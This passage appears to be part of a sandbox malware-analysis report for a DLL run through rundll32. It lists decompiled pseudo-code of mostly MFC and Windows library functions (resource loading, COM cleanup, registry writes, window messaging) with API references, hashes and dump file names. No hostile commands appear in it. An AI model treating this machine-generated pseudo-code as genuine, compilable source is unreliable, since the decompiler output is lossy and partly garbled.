COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E1001829A(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E10018237( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

APIs

SafeArrayDestroy.OLEAUT32 ref: 100182BB
CoTaskMemFree.OLE32(?), ref: 1001833E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
Instruction ID: c02b11928bb34d0169e99c27a309c5edd31e5ee767437d52a490cee524480b39
Opcode Fuzzy Hash: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
Instruction Fuzzy Hash: 831149306006169FDB95DF65D888BAE77E9EF05A82B594428F866DE190CB35DF80CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016E59 Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E10016E59(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E1001FBC4(E100341C0, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038988;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E1000EC55(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E10010284(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E1000E519();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038068;
						E100102E5(_t64 - 0x1c);
						return E1001FC9C(_t55);
					}
					_push(_t60);
					E10015A21( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E1000E519();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 10016E60
GetRgnBox.GDI32(?,?), ref: 10016EDB
IntersectRect.USER32 ref: 10016EF0
EqualRect.USER32 ref: 10016EFE

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
Instruction ID: 9e2c62e01a377e36abd0cffc80b86d38f34e6c8c4516d003d55709a082953a26
Opcode Fuzzy Hash: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
Instruction Fuzzy Hash: BA21027690024AEFDF02DFA4CC809AEBBB8FF08201F00855AF555AB112DB75EA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100050DA Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E100050DA(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E1001FBC4(E10032EBF, __ebx, __edi, __esi);
				_t35 = E10004D4A(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E100050A8(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E100209E8( &_a4, 0x1003e34c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10004EB7(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

APIs

__EH_prolog3.LIBCMT ref: 100050E1

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

__CxxThrowException@8.LIBCMT ref: 10005117
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,1000103F,00000000,00000000,?,?,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10005140

Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7

LocalFree.KERNEL32(1000103F,1000103F,8007000E,100010E9), ref: 10005169

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
Instruction ID: 9a825a0554ffdf54c91d77e2f252a4914c60dad5953363715cdae4c7005f82be
Opcode Fuzzy Hash: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
Instruction Fuzzy Hash: E0117071604249BFEB01DFA4CC81AAF7BA9FF08391F118529F629CB291D7329E50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10007DCD Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10007DCD(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000EC09(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 10007DF3
LoadResource.KERNEL32(?,00000000), ref: 10007DFB
LockResource.KERNEL32(00000000), ref: 10007E0D
FreeResource.KERNEL32(00000000), ref: 10007E57

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
Instruction ID: 3dc56c73a436512b808f722c38b75c0ae418026c2f8f50a1f0547d44829b82b9
Opcode Fuzzy Hash: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
Instruction Fuzzy Hash: B3119D70902B95EFE710DF61CC88AABB3B8FF08395B218499E84653555E3B8AD40D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 10006279 Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10006279(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1001FBC4(E10032FC2, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E10006D2B(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1003701c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E10021041( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000EC09(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E10004E6E(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E10005EE5(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E1001FC9C(_t51);
			}

APIs

__EH_prolog3.LIBCMT ref: 10006280

Part of subcall function 10006D2B: __EH_prolog3.LIBCMT ref: 10006D32

__strdup.LIBCMT ref: 100062A2
GetCurrentThread.KERNEL32 ref: 100062CF
GetCurrentThreadId.KERNEL32 ref: 100062D8

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
Instruction ID: a861acdeb37d33d153d410a00307fa8db88fca58120f636a03fd206092374481
Opcode Fuzzy Hash: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
Instruction Fuzzy Hash: CA218CB4800B50CED721DF6AC58125AFBE8FFA4340F20891FE1AA86622CBB4A541CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4FC Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000C4FC(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E1000BBDF(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10044410;
					E100209E8( &_v20, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, SendMessageA, _t33);
					_t29 = E100105C8(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000E58E(_t29);
					}
					return E1001FC9C(_t24);
				}
			}

APIs

SendMessageA.USER32 ref: 1000C526
SendMessageA.USER32 ref: 1000C551

Part of subcall function 1000B21C: GetTopWindow.USER32(?), ref: 1000B22A

GetCapture.USER32 ref: 1000C563
SendMessageA.USER32 ref: 1000C572

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
Instruction ID: 6be588b9800c4661a8048c77b3f4dc846bf52327d538fd1bacd6bd973810de05
Opcode Fuzzy Hash: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
Instruction Fuzzy Hash: CE0184B535061C7FFA216B248CC9FBB36ADEB4C7C9F010534F2419B0A6C6915C405620

Uniqueness

Uniqueness Score: -1.00%

Function 1000DA65 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000DA65(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E1000EC09(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1000DA89
LoadResource.KERNEL32(?,00000000), ref: 1000DA95
LockResource.KERNEL32(00000000), ref: 1000DAA3
FreeResource.KERNEL32(00000000), ref: 1000DAD1

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
Instruction ID: 4e046e32b577ecbefe1a9e82239a09ae3eb10ed0fe8967592b5f7829ae1b7b8f
Opcode Fuzzy Hash: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
Instruction Fuzzy Hash: 71113A71604214EFEB01DFA5C888AAE7BB9FF0A390F01806AF90697261CB75DD00CF61

Uniqueness

Uniqueness Score: -1.00%

Function 10010F7E Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10010F7E(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10045580; // 0x2ef01728
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10020F02( &_v24, 0x10, 0x1003809c, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10010F38(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1001FBB5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10010FB7
RegCloseKey.ADVAPI32(00000000), ref: 10010FC0
_swprintf.LIBCMT ref: 10010FDD
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10010FEE

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
Instruction ID: 3a2604f4cfee837da5f4817c2b18a2a2174cbb3477f90de8d09310f3c9904bd3
Opcode Fuzzy Hash: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
Instruction Fuzzy Hash: 5001C07260031AABDB11DF648D86FBF77ACEF48704F400429FA01EB152DBB4E90587A0

Uniqueness

Uniqueness Score: -1.00%

Function 10016DC9 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E10016DC9(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E1000EC55( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
